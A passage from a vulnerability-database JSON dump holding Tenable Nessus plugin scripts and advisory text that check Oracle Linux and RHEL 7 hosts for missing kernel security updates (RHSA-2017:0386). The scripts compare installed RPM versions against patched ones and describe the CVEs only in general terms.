security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0386 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. 
This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-March/006747.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-0386\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.10\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && 
rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:07:10", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. 
To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "RHEL 7 : kernel (RHSA-2017:0386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2017-0386.NASL", "href": "https://www.tenable.com/plugins/nessus/97509", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0386. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97509);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0386\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2017:0386)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. 
A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nAdditional Changes :\n\nSpace precludes documenting all of the bug fixes and enhancements\nincluded in this advisory. To see the complete list of bug fixes and\nenhancements, refer to the following KnowledgeBase article:\nhttps://access.redhat.com/articles/ 2940041.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2940041\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9084\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2017:0386\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0386\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if 
(!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.10.2.el7\")) 
flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:49:36", "description": "Security Fix(es) :\n\n - Linux kernel built with the Kernel-based Virtual Machine\n (CONFIG_KVM) support is vulnerable to a NULL pointer\n dereference flaw. It could occur on x86 platform, when\n emulating an undefined instruction. An attacker could\n use this flaw to crash the host kernel resulting in DoS.\n (CVE-2016-8630, Important)\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket 